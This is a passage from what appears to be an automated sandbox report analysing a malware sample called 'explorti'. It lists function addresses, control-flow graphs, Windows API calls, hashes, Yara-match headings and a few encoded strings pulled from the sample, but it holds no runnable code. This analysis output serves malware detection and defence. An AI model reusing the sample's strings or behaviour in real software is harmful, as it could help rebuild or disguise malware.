                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: File__dosmaperr$HandleInformationType
                        • String ID:
                        • API String ID: 2531987475-0
                        • Opcode ID: 5282ed96c9fa9d246f9f53e87c60f1efe10e97fbbb0973c093071927fc8f77ab
                        • Instruction ID: c67e80f7718cb912dbfed75fab66154e824ac3ce6a079469af6a695afc114123
                        • Opcode Fuzzy Hash: 5282ed96c9fa9d246f9f53e87c60f1efe10e97fbbb0973c093071927fc8f77ab
                        • Instruction Fuzzy Hash: 44416DB9900644AFDB24EFB5EC419ABBBF9EF8A300B14442DF456D3650DB30E940CB60
                        Function 00178290 Relevance: 1.7, APIs: 1, Instructions: 159COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1367 178290-178311 call 1a4000 1371 178313-178318 1367->1371 1372 17831d-178345 call 187840 call 175b00 1367->1372 1373 17845f-17847b call 18cef4 1371->1373 1380 178347 1372->1380 1381 178349-17836b call 187840 call 175b00 1372->1381 1380->1381 1386 17836f-178388 1381->1386 1387 17836d 1381->1387 1390 17838a-178399 1386->1390 1391 1783b9-1783e4 1386->1391 1387->1386 1392 1783af-1783b6 call 18d569 1390->1392 1393 17839b-1783a9 1390->1393 1394 1783e6-1783f5 1391->1394 1395 178411-178432 1391->1395 1392->1391 1393->1392 1396 17847c-178481 call 1a6b7a 1393->1396 1398 178407-17840e call 18d569 1394->1398 1399 1783f7-178405 1394->1399 1400 178434-178436 GetNativeSystemInfo 1395->1400 1401 178438-17843d 1395->1401 1398->1395 1399->1396 1399->1398 1405 17843e-178445 1400->1405 1401->1405 1405->1373 1406 178447-17844f 1405->1406 1410 178451-178456 1406->1410 1411 178458-17845b 1406->1411 1410->1373 1411->1373 1412 17845d 1411->1412 1412->1373
                        APIs
                        • GetNativeSystemInfo.KERNELBASE(?), ref: 00178434
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: InfoNativeSystem
                        • String ID:
                        • API String ID: 1721193555-0
                        • Opcode ID: beba09fc60fa6053e1d2269a89250955617465207b7deebc52861b97ab2ba464
                        • Instruction ID: a327155d8dcaca7912b42f1eea11fd10d11c80a153669ceb01e445b65c32b912
                        • Opcode Fuzzy Hash: beba09fc60fa6053e1d2269a89250955617465207b7deebc52861b97ab2ba464
                        • Instruction Fuzzy Hash: C9515770D402089BEB24EB38CD497EDB775EB55314F508299E81DA73C1EF749E808BA1
                        Function 001A6C79 Relevance: 1.6, APIs: 1, Instructions: 89COMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1413 1a6c79-1a6c85 1414 1a6c87-1a6ca3 call 1a7410 call 1a7423 call 1a6b6a 1413->1414 1415 1a6ca4-1a6cc8 call 1a4000 1413->1415 1420 1a6cca-1a6ce4 call 1a7410 call 1a7423 call 1a6b6a 1415->1420 1421 1a6ce6-1a6d08 CreateFileW 1415->1421 1445 1a6d52-1a6d56 1420->1445 1424 1a6d0a-1a6d0e call 1a6de1 1421->1424 1425 1a6d18-1a6d1f call 1a6d57 1421->1425 1432 1a6d13-1a6d16 1424->1432 1436 1a6d20-1a6d22 1425->1436 1432->1436 1437 1a6d44-1a6d47 1436->1437 1438 1a6d24-1a6d41 call 1a4000 1436->1438 1441 1a6d49-1a6d4f 1437->1441 1442 1a6d50 1437->1442 1438->1437 1441->1442 1442->1445
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 223d54832c68294ea0c8a2cf4a300c04d4b8754083f0f2a72c6d0fc559c82692
                        • Instruction ID: 396e8e9dccc3a5087cf93f70af93097f06e16654079678dcf157fb4cc54b0210
                        • Opcode Fuzzy Hash: 223d54832c68294ea0c8a2cf4a300c04d4b8754083f0f2a72c6d0fc559c82692
                        • Instruction Fuzzy Hash: 7A21DA75A052087AEB11BBB4AC42B9E3B29DF53378F250314F9743B1D1DBB05E0596A1
                        Function 001A6F51 Relevance: 1.6, APIs: 1, Instructions: 56timeCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1447 1a6f51-1a6f67 1448 1a6f69-1a6f6d 1447->1448 1449 1a6f77-1a6f87 1447->1449 1448->1449 1450 1a6f6f-1a6f75 1448->1450 1454 1a6f89-1a6f9b SystemTimeToTzSpecificLocalTime 1449->1454 1455 1a6fc7-1a6fca 1449->1455 1451 1a6fcc-1a6fd7 call 18cef4 1450->1451 1454->1455 1457 1a6f9d-1a6fbd call 1a6fd8 1454->1457 1455->1451 1459 1a6fc2-1a6fc5 1457->1459 1459->1451
                        APIs
                        • SystemTimeToTzSpecificLocalTime.KERNELBASE(00000000,?,?), ref: 001A6F93
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Time$LocalSpecificSystem
                        • String ID:
                        • API String ID: 2574697306-0
                        • Opcode ID: fecef61f0d3d57b3869c9b8f0a37ad906fd028ce8131cfe4d2464996b33892fd
                        • Instruction ID: 49d8738773bae10f1f8328d4fbbab631b8c1c338693b7b4c1f80cfe953241f56
                        • Opcode Fuzzy Hash: fecef61f0d3d57b3869c9b8f0a37ad906fd028ce8131cfe4d2464996b33892fd
                        • Instruction Fuzzy Hash: 1F1130B690010DAFDB01DE95D840EDFB7FCAF09310F644266E511E2180EB30EB49CB61
                        Function 001AAEEB Relevance: 1.5, APIs: 1, Instructions: 33memoryCOMMONLIBRARYCODE
                        Download Yara Rule

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 1460 1aaeeb-1aaef7 1461 1aaf29-1aaf34 call 1a7423 1460->1461 1462 1aaef9-1aaefb 1460->1462 1470 1aaf36-1aaf38 1461->1470 1463 1aaefd-1aaefe 1462->1463 1464 1aaf14-1aaf25 RtlAllocateHeap 1462->1464 1463->1464 1466 1aaf00-1aaf07 call 1a9c61 1464->1466 1467 1aaf27 1464->1467 1466->1461 1472 1aaf09-1aaf12 call 1a8cd9 1466->1472 1467->1470 1472->1461 1472->1464
                        APIs
                        • RtlAllocateHeap.NTDLL(00000000,00186AF7,?,?,0018D302,00186AF7,?,001878CB,8B18EC84,04AF08F4), ref: 001AAF1E
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: AllocateHeap
                        • String ID:
                        • API String ID: 1279760036-0
                        • Opcode ID: 51c322b91c4fce5763e2316170a44176533ae5816aa12dd0be44a12d656ea94f
                        • Instruction ID: 383f36ff54925000b8e3d25941b223650c5b9ea50c24dce909c3a1892adcc6ea
                        • Opcode Fuzzy Hash: 51c322b91c4fce5763e2316170a44176533ae5816aa12dd0be44a12d656ea94f
                        • Instruction Fuzzy Hash: 47E092BD1062226EDB2937659C41B6F768CDF973B1F960121AE05971C0EB75DC40C5F2
                        Function 00186AB0 Relevance: 1.3, APIs: 1, Instructions: 40sleepCOMMON
                        Download Yara Rule

                        Control-flow Graph

                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: Sleep
                        • String ID:
                        • API String ID: 3472027048-0
                        • Opcode ID: c46ef29136aea35106a2ef303ff8587886b065d616d5256237d3760d727a93a7
                        • Instruction ID: 605a5ac1f800887627bffefe40cce008d41966c154772d43991842b587fa247d
                        • Opcode Fuzzy Hash: c46ef29136aea35106a2ef303ff8587886b065d616d5256237d3760d727a93a7
                        • Instruction Fuzzy Hash: F9F0F471A00514ABC700BB688D07B1EBF75EB26B20F900399F834673D1EBB05A008BD3
                        Function 04B60D56 Relevance: .1, Instructions: 116COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e943b1f966c00450d71a19fbd918407481d0adaa4dfe3ff3cbc8b16482b0de38
                        • Instruction ID: b90122f5c35eb74eab7141e950ba5af5ea524bce4bcd9f41c5850723a1aa6cdc
                        • Opcode Fuzzy Hash: e943b1f966c00450d71a19fbd918407481d0adaa4dfe3ff3cbc8b16482b0de38
                        • Instruction Fuzzy Hash: B521DBFB64D1507EB241D6966B109F76B7DEAC377033089A6F847C6401E2986E4A3271
                        Function 04B60D97 Relevance: .1, Instructions: 115COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e1bd0e9e645570996148acadf3671a549fd9ea72b83fc0ea4c4d99e7bc486712
                        • Instruction ID: d5866fd4f25d91f1666ce0f5aa498f4481bb91daa6142413dcd1cddab7522d8b
                        • Opcode Fuzzy Hash: e1bd0e9e645570996148acadf3671a549fd9ea72b83fc0ea4c4d99e7bc486712
                        • Instruction Fuzzy Hash: 5321E4FB64D1507D7201E6967B50AFB6B6DE6C2770330896BF843C6502E2986E4E3171
                        Function 04B60D4C Relevance: .1, Instructions: 94COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 6169e2bfe7b6b81fc113e3364cd825bc6c7f4934bffabe72a38e8716571ed301
                        • Instruction ID: b4f98f574f6ad60334b7b791eba375b31b417184215a14eab835b3f6dcb6a1d6
                        • Opcode Fuzzy Hash: 6169e2bfe7b6b81fc113e3364cd825bc6c7f4934bffabe72a38e8716571ed301
                        • Instruction Fuzzy Hash: 6B01D7FB64D120BD7151E1966B14AFBA76DE5C2730330C96AF803C6502E2986E4A3131
                        Function 04B60D32 Relevance: .1, Instructions: 92COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 72462831138023738b1c08b846971e2581d51b2aee3e141c4aed0aa5c2ddcb6b
                        • Instruction ID: f571b3b4813e44c5021226d73e6e50845d1f7555ee8b3ae2a4985d9c63be346a
                        • Opcode Fuzzy Hash: 72462831138023738b1c08b846971e2581d51b2aee3e141c4aed0aa5c2ddcb6b
                        • Instruction Fuzzy Hash: 760152FB64D2507DB142E2963B249FB6B6DE9C373033088BBF843C6542E6995E4E6131
                        Function 04B60D89 Relevance: .1, Instructions: 84COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: b61753a6b57a776499854439d2408fe85a9f984ee722263e28f92f4b1c962bc1
                        • Instruction ID: ffdeed6a8bd56090be5a87beab24a536ec8b2c9036c66431c99b8b9a69382d56
                        • Opcode Fuzzy Hash: b61753a6b57a776499854439d2408fe85a9f984ee722263e28f92f4b1c962bc1
                        • Instruction Fuzzy Hash: 2E01E8FB6492107D7141E6967B64EFBA7ADE5C2730330C83BF843C2502E2A85E4E2231
                        Function 04B60DD4 Relevance: .1, Instructions: 53COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 02072e325d34c06741b94ae6134fddb5011c79a54332e7d785c99aab79c1ded7
                        • Instruction ID: 0cf5afedd7b149c95e9fba2e6db246cb104def529b27761155746f115c84abcf
                        • Opcode Fuzzy Hash: 02072e325d34c06741b94ae6134fddb5011c79a54332e7d785c99aab79c1ded7
                        • Instruction Fuzzy Hash: CBF039FBA4A1107D7152E2923F28AF7AB6EE4C2730334C83AF803D2502E6DC4E492071
                        Function 04B60DF7 Relevance: .0, Instructions: 40COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4138572980.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, Offset: 04B60000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_4b60000_explorti.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7f2688754bd41db0d5abb0dfbbcbe6b18229ab3a02b75af8ea53d37850042f23
                        • Instruction ID: 96266e253421f0886729ba04830d705c3d92306210c784bc211936a2a5f362cd
                        • Opcode Fuzzy Hash: 7f2688754bd41db0d5abb0dfbbcbe6b18229ab3a02b75af8ea53d37850042f23
                        • Instruction Fuzzy Hash: CDE0E5BB5482947DB60196B526549FAAB6DE5C3330735D87EF882C2501D694490E5230

                        Non-executed Functions

                        Function 0017E410 Relevance: 13.5, Strings: 10, Instructions: 1000COMMON
                        Download Yara Rule
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID:
                        • String ID: 111$246122658369$4dd39d$JgNn9TI9$PJ==$PzE+$Xt==$ZMs=$ZMw=$Zww=
                        • API String ID: 0-3156695209
                        • Opcode ID: 064762fe6a8f7e7840c2fff851c19cc8e4600f8bfc33ab035b675909667e95e4
                        • Instruction ID: 4f2b9da0ca6868fc0c89f314029515ed7d77333f8a2fff2c55cd2de02bec0b06
                        • Opcode Fuzzy Hash: 064762fe6a8f7e7840c2fff851c19cc8e4600f8bfc33ab035b675909667e95e4
                        • Instruction Fuzzy Hash: 8882E670904248DBEF14EF68C9597DE7FB6AB16304F608199E814673C2C7B59B88CF92
                        Function 001B3048 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON
                        Download Yara Rule
                        APIs
                        Strings
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136735422.0000000000624000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136755429.0000000000625000.00000080.00000001.01000000.00000007.sdmpDownload File
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_170000_explorti.jbxd
                        Yara matches
                        Similarity
                        • API ID: __floor_pentium4
                        • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                        • API String ID: 4168288129-2761157908
                        • Opcode ID: c2017920f4d5840cf0cdb4221f08cce0adc936b2ac7e0225d04f78d64abad936
                        • Instruction ID: b48208683695e6d96d5f36e24d87aa4b4600124afefe9744af4b6aa7b49942cf
                        • Opcode Fuzzy Hash: c2017920f4d5840cf0cdb4221f08cce0adc936b2ac7e0225d04f78d64abad936
                        • Instruction Fuzzy Hash: 6AC24B71E086288FDB25CE28DD807EAB7B5EB88304F1541EAD85DE7241E774AF918F41
                        Function 001B2BB0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON
                        Download Yara Rule
                        Memory Dump Source
                        • Source File: 00000001.00000002.4135900487.0000000000171000.00000040.00000001.01000000.00000007.sdmp, Offset: 00170000, based on PE: true
                        • Associated: 00000001.00000002.4135873294.0000000000170000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4135900487.00000000001D2000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136028607.00000000001D9000.00000004.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.00000000001DB000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000035F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000442000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.000000000046F000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000475000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136055434.0000000000485000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136556308.0000000000486000.00000080.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136695256.0000000000622000.00000040.00000001.01000000.00000007.sdmpDownload File
                        • Associated: 00000001.00000002.4136714999.0000000000623000.00000080.00000001.01000000.00000007.sdmpDownload File
